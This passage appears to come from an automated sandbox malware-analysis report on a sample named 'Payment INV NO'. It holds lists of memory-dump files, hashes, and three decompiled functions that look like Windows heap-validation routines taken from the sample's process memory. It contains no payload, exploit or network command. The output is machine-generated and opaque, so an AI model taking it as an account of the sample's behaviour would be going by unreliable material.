                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-3616360210
                                                          • Opcode ID: 58e623903df37039fb38a3b996d7565f9e1330a612cd63ad2a99f9add86465d8
                                                          • Instruction ID: 26c47f9d888374715b644f6aaa5a58e2d7b3d7269e7d8f723e8691ec7fc8563c
                                                          • Opcode Fuzzy Hash: 58e623903df37039fb38a3b996d7565f9e1330a612cd63ad2a99f9add86465d8
                                                          • Instruction Fuzzy Hash: 2061AE70640205DFDB29DF28C885BAAFBE5FF45304F1885AEEC498B256D770E981CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017BEB9A Relevance: 2.7, Strings: 2, Instructions: 156COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 75%
                                                          			E017BEB9A(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t62;
				signed int _t63;
				intOrPtr _t64;
				signed int _t65;
				intOrPtr _t77;
				signed int* _t91;
				intOrPtr _t92;
				signed int _t95;
				signed char _t109;
				signed int _t114;
				unsigned int _t119;
				intOrPtr* _t122;
				intOrPtr _t127;
				signed int _t130;
				void* _t135;

				_t92 = __ecx;
				_t122 = __edx;
				_v8 = __ecx;
				 *((intOrPtr*)(__ecx + 0xb4)) = __edx;
				if( *__edx != 0) {
					_t95 =  *((intOrPtr*)(__edx + 4)) -  *((intOrPtr*)(__edx + 0x14)) - 1;
					__eflags =  *(__edx + 8);
					if(__eflags != 0) {
						_t95 = _t95 + _t95;
					}
					 *( *((intOrPtr*)(_t122 + 0x20)) + _t95 * 4) =  *( *((intOrPtr*)(_t122 + 0x20)) + _t95 * 4) & 0x00000000;
					asm("btr eax, esi");
					_t92 = _v8;
				}
				_t62 = _t92 + 0xc0;
				_t127 =  *((intOrPtr*)(_t62 + 4));
				while(1) {
					L2:
					_v12 = _t127;
					if(_t62 == _t127) {
						break;
					}
					_t91 = _t127 - 8;
					if( *((intOrPtr*)(_t92 + 0x4c)) != 0) {
						_t119 =  *(_t92 + 0x50) ^  *_t91;
						 *_t91 = _t119;
						_t109 = _t119 >> 0x00000010 ^ _t119 >> 0x00000008 ^ _t119;
						if(_t119 >> 0x18 != _t109) {
							_push(_t109);
							L0184FA2B(_t91, _v8, _t91, _t122, _t127, __eflags);
						}
						_t92 = _v8;
					}
					_t114 =  *_t91 & 0x0000ffff;
					_t63 = _t122;
					_t135 = _t114 -  *((intOrPtr*)(_t122 + 4));
					while(1) {
						_v20 = _t63;
						if(_t135 < 0) {
							break;
						}
						_t130 =  *_t63;
						_v16 = _t130;
						_t127 = _v12;
						if(_t130 != 0) {
							_t63 = _v16;
							__eflags = _t114 -  *((intOrPtr*)(_t63 + 4));
							continue;
						}
						_v16 =  *((intOrPtr*)(_t63 + 4)) - 1;
						L10:
						if( *_t122 != 0) {
							_t64 =  *((intOrPtr*)(_t122 + 4));
							__eflags = _t114 - _t64;
							_t65 = _t64 - 1;
							__eflags = _t65;
							if(_t65 < 0) {
								_t65 = _t114;
							}
							E017BBC04(_t92, _t122, 1, _t127, _t65, _t114);
						}
						E017BE4A0(_v8, _v20, 1, _t127, _v16,  *_t91 & 0x0000ffff);
						if( *0x1888748 >= 1) {
							__eflags =  *( *((intOrPtr*)(_v20 + 0x1c)) + (_v16 -  *((intOrPtr*)(_v20 + 0x14)) >> 5) * 4) & 1 << (_v16 -  *((intOrPtr*)(_v20 + 0x14)) & 0x0000001f);
							if(__eflags == 0) {
								_t77 =  *[fs:0x30];
								__eflags =  *(_t77 + 0xc);
								if( *(_t77 + 0xc) == 0) {
									_push("HEAP: ");
									E0179B150();
								} else {
									E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(0x178f868);
								E0179B150();
								__eflags =  *0x1887bc8;
								if(__eflags == 0) {
									__eflags = 1;
									L01852073(_t91, 1, _t122, 1);
								}
							}
							_t127 = _v12;
						}
						_t92 = _v8;
						if( *((intOrPtr*)(_t92 + 0x4c)) != 0) {
							_t91[0] = _t91[0] ^ _t91[0] ^  *_t91;
							 *_t91 =  *_t91 ^  *(_t92 + 0x50);
						}
						_t127 =  *((intOrPtr*)(_t127 + 4));
						_t62 = _t92 + 0xc0;
						goto L2;
					}
					_v16 = _t114;
					goto L10;
				}
				return _t62;
			}


























                                                          0x017beb9a
                                                          0x017beba5
                                                          0x017beba7
                                                          0x017bebaa
                                                          0x017bebb3
                                                          0x017beca0
                                                          0x017beca1
                                                          0x017beca5
                                                          0x017becd1
                                                          0x017becd1
                                                          0x017becaa
                                                          0x017becc3
                                                          0x017becc9
                                                          0x017becc9
                                                          0x017bebb9
                                                          0x017bebbf
                                                          0x017bebc2
                                                          0x017bebc2
                                                          0x017bebc2
                                                          0x017bebc7
                                                          0x00000000
                                                          0x00000000
                                                          0x017bebd1
                                                          0x017bebd4
                                                          0x017bebd9
                                                          0x017bebdd
                                                          0x017bebe9
                                                          0x017bebf0
                                                          0x01804258
                                                          0x0180425e
                                                          0x0180425e
                                                          0x017bebf6
                                                          0x017bebf6
                                                          0x017bebf9
                                                          0x017bebfc
                                                          0x017bebfe
                                                          0x017bec01
                                                          0x017bec01
                                                          0x017bec04
                                                          0x00000000
                                                          0x00000000
                                                          0x017bec0a
                                                          0x017bec0e
                                                          0x017bec11
                                                          0x017bec14
                                                          0x017bec8f
                                                          0x017bec92
                                                          0x00000000
                                                          0x017bec92
                                                          0x017bec1a
                                                          0x017bec1d
                                                          0x017bec20
                                                          0x017bec72
                                                          0x017bec75
                                                          0x017bec77
                                                          0x017bec77
                                                          0x017bec78
                                                          0x017bec7a
                                                          0x017bec7a
                                                          0x017bec83
                                                          0x017bec83
                                                          0x017bec32
                                                          0x017bec3e
                                                          0x01804281
                                                          0x01804284
                                                          0x01804286
                                                          0x0180428c
                                                          0x01804290
                                                          0x018042af
                                                          0x018042b4
                                                          0x01804292
                                                          0x018042a7
                                                          0x018042ac
                                                          0x018042ba
                                                          0x018042bf
                                                          0x018042c4
                                                          0x018042cc
                                                          0x018042d0
                                                          0x018042d1
                                                          0x018042d1
                                                          0x018042cc
                                                          0x018042d6
                                                          0x018042d6
                                                          0x017bec44
                                                          0x017bec4b
                                                          0x017bec55
                                                          0x017bec5b
                                                          0x017bec5b
                                                          0x017bec5d
                                                          0x017bec60
                                                          0x00000000
                                                          0x017bec60
                                                          0x017bec8a
                                                          0x00000000
                                                          0x017bec8a
                                                          0x017bec71

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-3616360210
                                                          • Opcode ID: e59b61c6e1ffbdb488e6f376e71512233c34c2ba266ab2ab736aeef7ab015a93
                                                          • Instruction ID: 4bfeb22c8ea11daae517f6d1b13d72cb4e0c0a0eb7ef32bc3e6970dc33f96182
                                                          • Opcode Fuzzy Hash: e59b61c6e1ffbdb488e6f376e71512233c34c2ba266ab2ab736aeef7ab015a93
                                                          • Instruction Fuzzy Hash: C351EE70A00519DFDB14DF58C484BAAFBB2FF85300F1581A9E9059B346DB70A942CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01793FC5 Relevance: 2.6, Strings: 2, Instructions: 131COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 60%
                                                          			E01793FC5(signed int __edx, intOrPtr _a4) {
				void* __ecx;
				signed char _t44;
				signed char _t48;
				intOrPtr* _t50;
				unsigned int _t51;
				signed char _t52;
				signed int _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr* _t64;
				void* _t65;
				void* _t78;

				_t58 = __edx;
				_t78 = _t59;
				if(__edx == 0 || (__edx & 0x00000007) != 0) {
					L37:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0179B150();
					} else {
						E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t58 + 8);
					_push(_t78);
					E0179B150(0x178f4fc, _a4);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1886378 = 1;
						asm("int3");
						 *0x1886378 = 0;
					}
					return 0;
				} else {
					_t44 =  *((intOrPtr*)(__edx + 7));
					if((_t44 & 0x0000003f) == 0) {
						goto L37;
					}
					if(_t44 < 0) {
						if( *((char*)(_t78 + 0xda)) != 2) {
							_t62 = 0;
						} else {
							_t62 =  *((intOrPtr*)(_t78 + 0xd4));
						}
						if(_t62 != 0) {
							if(_t44 != 4) {
								L23:
								return 1;
							}
						}
						goto L37;
					}
					if( *(_t78 + 0x4c) == 0 || ( *(_t78 + 0x50) ^  *__edx) >> 0x18 == (( *(_t78 + 0x50) ^  *__edx) >> 0x00000010 ^ ( *(_t78 + 0x50) ^  *__edx) >> 0x00000008 ^ _t76)) {
						if( *((char*)(_t58 + 7)) == 4) {
							if((_t58 & 0x00000fff) != 0x18) {
								goto L37;
							}
							L13:
							if( *(_t78 + 0x4c) == 0) {
								_t48 =  *((intOrPtr*)(_t58 + 2));
							} else {
								_t51 =  *_t58;
								if(( *(_t78 + 0x4c) & _t51) != 0) {
									_t51 = _t51 ^  *(_t78 + 0x50);
								}
								_t48 = _t51 >> 0x10;
							}
							if((_t48 & 0x00000004) != 0) {
								if(L018423E3(_t78, _t58) != 0) {
									goto L18;
								}
							} else {
								L18:
								if( *((char*)(_t58 + 7)) == 4) {
									goto L23;
								}
								_t64 = _t78 + 0xa4;
								_t50 =  *_t64;
								while(_t50 != _t64) {
									if(_t58 <  *((intOrPtr*)(_t50 + 0x14)) || _t58 >=  *((intOrPtr*)(_t50 + 0x18))) {
										_t50 =  *_t50;
										continue;
									} else {
										goto L23;
									}
								}
							}
							goto L37;
						}
						_t52 =  *((intOrPtr*)(_t58 + 6));
						if(_t52 == 0) {
							_t65 = _t78;
						} else {
							_t65 = (_t58 & 0xffff0000) - ((_t52 & 0x000000ff) << 0x10) + 0x10000;
						}
						if(_t65 == 0 ||  *((intOrPtr*)(_t65 + 0x18)) != _t78 || _t58 <  *((intOrPtr*)(_t65 + 0x24)) || _t58 >=  *((intOrPtr*)(_t65 + 0x28))) {
							goto L37;
						} else {
							goto L13;
						}
					} else {
						goto L37;
					}
				}
			}















                                                          0x01793fcc
                                                          0x01793fcf
                                                          0x01793fd3
                                                          0x017f03b8
                                                          0x017f03c2
                                                          0x017f03e1
                                                          0x017f03e6
                                                          0x017f03c4
                                                          0x017f03d9
                                                          0x017f03de
                                                          0x017f03ef
                                                          0x017f03f0
                                                          0x017f03f9
                                                          0x017f040b
                                                          0x017f040d
                                                          0x017f0414
                                                          0x017f0415
                                                          0x017f0415
                                                          0x00000000
                                                          0x01793fe2
                                                          0x01793fe2
                                                          0x01793fe7
                                                          0x00000000
                                                          0x00000000
                                                          0x01793fef
                                                          0x017940b8
                                                          0x017940d8
                                                          0x017940ba
                                                          0x017940ba
                                                          0x017940ba
                                                          0x017940c2
                                                          0x017940ca
                                                          0x017940a4
                                                          0x00000000
                                                          0x017940a4
                                                          0x017940cc
                                                          0x00000000
                                                          0x017940c2
                                                          0x01793ff9
                                                          0x0179401f
                                                          0x017f03a0
                                                          0x00000000
                                                          0x00000000
                                                          0x01794069
                                                          0x0179406d
                                                          0x017940dc
                                                          0x0179406f
                                                          0x0179406f
                                                          0x01794074
                                                          0x01794076
                                                          0x01794076
                                                          0x01794079
                                                          0x01794079
                                                          0x0179407e
                                                          0x017f03b2
                                                          0x00000000
                                                          0x00000000
                                                          0x01794084
                                                          0x01794084
                                                          0x01794088
                                                          0x00000000
                                                          0x00000000
                                                          0x0179408a
                                                          0x01794090
                                                          0x01794092
                                                          0x0179409d
                                                          0x017940ad
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0179409d
                                                          0x01794092
                                                          0x00000000
                                                          0x0179407e
                                                          0x01794025
                                                          0x0179402a
                                                          0x017940d1
                                                          0x01794030
                                                          0x01794040
                                                          0x01794040
                                                          0x01794048
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01793ff9

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-3616360210
                                                          • Opcode ID: 0c727aa76a39e94fff2611a11100f52da1a1e50ad571fd68eaf025ce01f4fb1b
                                                          • Instruction ID: 4bf832af5e7465decfd85e0b46856f1435a11d0ccc935ea39406ca31b8586f06
                                                          • Opcode Fuzzy Hash: 0c727aa76a39e94fff2611a11100f52da1a1e50ad571fd68eaf025ce01f4fb1b
                                                          • Instruction Fuzzy Hash: 4E41A171200340CBEF398B1DD595B7BFBA2DF01618F1844ADE6464B757C666D48AC722
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01794439 Relevance: 2.6, Strings: 2, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E01794439(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				intOrPtr _v76;
				signed int _v84;
				signed int _v88;
				char _v92;
				signed int _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t64;
				signed int _t68;
				intOrPtr* _t72;
				signed int _t74;
				void* _t77;
				signed int _t83;
				signed int _t84;

				_t79 = __edx;
				_t54 =  *0x188d360 ^ _t84;
				_v8 =  *0x188d360 ^ _t84;
				_t82 = __ecx;
				_v96 = __edx;
				_t74 = __edx;
				if(__edx != 0 && ( *(__edx + 8) & 0x00000004) == 0) {
					_t82 = __ecx + 4;
					_t72 =  *_t82;
					while(_t72 != _t82) {
						_t83 = _t72 - 8;
						_t79 = 1;
						if( *_t83 != 0x74736c46) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = 1;
							_v68 = 1;
							_v64 = _t82;
							_v60 = _t83;
							_v92 = 0xc0150015;
							_v88 = 1;
							L017EDEF0(_t74, 1);
							_t74 = _v96;
							_t79 = 1;
						}
						if( *(_t83 + 0x14) !=  !( *(_t83 + 4))) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = _t79;
							_v68 = 2;
							_v64 = _t82;
							_v60 = _t83;
							_v92 = 0xc0150015;
							_v88 = _t79;
							L017EDEF0(_t74, _t79);
							_t74 = _v96;
						}
						_t9 = _t83 + 0x18; // 0x1c
						_t54 = _t9;
						if(_t74 < _t9) {
							L13:
							_t72 =  *_t72;
							continue;
						} else {
							_t10 = _t83 + 0x618; // 0x61c
							_t54 = _t10;
							if(_t74 >= _t10) {
								goto L13;
							} else {
								_v96 = 0x30;
								_t64 = _t74 - _t83 - 0x18;
								asm("cdq");
								_t79 = _t64 % _v96;
								_t54 = 0x18 + _t64 / _v96 * 0x30 + _t83;
								if(_t74 == 0x18 + _t64 / _v96 * 0x30 + _t83) {
									_t54 =  *(_t83 + 4);
									if(_t54 != 0) {
										_t68 = _t54 - 1;
										 *(_t83 + 4) = _t68;
										_t54 =  !_t68;
										 *(_t83 + 0x14) =  !_t68;
										 *((intOrPtr*)(_t74 + 8)) = 4;
										if( *(_t83 + 4) == 0) {
											_t54 =  *(_t72 + 4);
											if(_t54 != _t82) {
												do {
													_t83 =  *(_t54 + 4);
													_t79 = _t54 - 8;
													if( *((intOrPtr*)(_t54 - 8 + 4)) == 0) {
														_t77 =  *_t54;
														if( *(_t77 + 4) != _t54 ||  *_t83 != _t54) {
															_push(3);
															asm("int 0x29");
															return 0x3e5;
														}
														 *_t83 = _t77;
														 *(_t77 + 4) = _t83;
														E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t79);
													}
													_t54 = _t83;
												} while (_t83 != _t82);
											}
										}
									}
								}
							}
						}
						goto L12;
					}
				}
				L12:
				return E017DB640(_t54, _t72, _v8 ^ _t84, _t79, _t82, _t83);
			}
























                                                          0x01794439
                                                          0x01794446
                                                          0x01794448
                                                          0x0179444e
                                                          0x01794450
                                                          0x01794453
                                                          0x01794457
                                                          0x01794467
                                                          0x0179446a
                                                          0x0179446c
                                                          0x01794472
                                                          0x01794475
                                                          0x0179447c
                                                          0x017f080d
                                                          0x017f0814
                                                          0x017f0815
                                                          0x017f081c
                                                          0x017f081f
                                                          0x017f0822
                                                          0x017f0825
                                                          0x017f0828
                                                          0x017f082f
                                                          0x017f0832
                                                          0x017f0837
                                                          0x017f083c
                                                          0x017f083c
                                                          0x0179448a
                                                          0x017f0842
                                                          0x017f0849
                                                          0x017f084a
                                                          0x017f0851
                                                          0x017f0854
                                                          0x017f085b
                                                          0x017f085e
                                                          0x017f0861
                                                          0x017f0868
                                                          0x017f086b
                                                          0x017f0870
                                                          0x017f0870
                                                          0x01794490
                                                          0x01794490
                                                          0x01794495
                                                          0x017944f8
                                                          0x017944f8
                                                          0x00000000
                                                          0x01794497
                                                          0x01794497
                                                          0x01794497
                                                          0x0179449f
                                                          0x00000000
                                                          0x017944a1
                                                          0x017944a3
                                                          0x017944ac
                                                          0x017944af
                                                          0x017944b0
                                                          0x017944b9
                                                          0x017944bd
                                                          0x017944bf
                                                          0x017944c4
                                                          0x017944c6
                                                          0x017944c7
                                                          0x017944ca
                                                          0x017944cc
                                                          0x017944cf
                                                          0x017944da
                                                          0x017944dc
                                                          0x017944e1
                                                          0x017f0878
                                                          0x017f0878
                                                          0x017f087b
                                                          0x017f0882
                                                          0x017f0884
                                                          0x017f0889
                                                          0x017f08b0
                                                          0x017f08b3
                                                          0x00000000
                                                          0x017f08b5
                                                          0x017f0896
                                                          0x017f089a
                                                          0x017f08a0
                                                          0x017f08a0
                                                          0x017f08a5
                                                          0x017f08a7
                                                          0x017f08ab
                                                          0x017944e1
                                                          0x017944da
                                                          0x017944c4
                                                          0x017944bd
                                                          0x0179449f
                                                          0x00000000
                                                          0x01794495
                                                          0x0179446c
                                                          0x017944e7
                                                          0x017944f7

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
